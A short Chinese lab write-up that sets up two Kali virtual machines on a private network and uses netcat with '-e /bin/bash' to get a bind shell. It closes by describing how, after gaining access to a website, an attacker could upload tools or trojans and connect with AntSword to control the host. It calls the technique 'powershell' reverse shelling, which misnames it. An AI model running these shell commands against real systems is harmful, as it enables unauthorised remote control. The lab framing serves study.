不要搞放在公网上的一切资产!
实验工具:kali两台(一台正向一台反向)、netcat(kali自带)
实验平台:vmware15.5
实验目的:理解powershell的目的,通过netcat来实现反弹,从而深入理解相关漏洞的危害
实验步骤:
1、启动两台kali,让彼此能ping通
使用 ifconfig 查看各自的ip地址
Debian作为攻击机 ip地址为192.168.245.134
kali2020作为被攻击机 IP地址为192.168.245.130
因为两台机子都用nat(网络地址转换)模式,所以可以ping通,主要模拟对公网设备实施操作。
2、正向反弹:
在Debian上 nc -lvvp 7777 -e /bin/bash
在kali上 nc 192.168.245.134 7777
结果就是可以在kali上拿到Debian的shell比如执行ls可以看到debian的目录
实验总结:本次实验简单试了一下netcat关于powershell反弹,简单的两句命令就能拿下服务器,可见如果不做好网络防护是多么危险的事情。netcat功能很多,可以通过很多种方式反弹,也不局限某个系统,不管windows、linux、macos都能利用。
注意到这次试验成功的前提是两台机子都有nc工具,才实现效果。那么如何利用,就要从网站的一些功能点下手,通常找到一些上传、下载的点,或者一些特殊的网站能直接运行命令(例如在线靶场),当我们取得某一权限(用户或者更高等级)之后上传工具或者脚本、木马等到后台,就可以进行下一步动作,可以用蚁剑连接,可以通过脚本运行本次实验的指令,让我们再攻击机就能控制目标主机权限。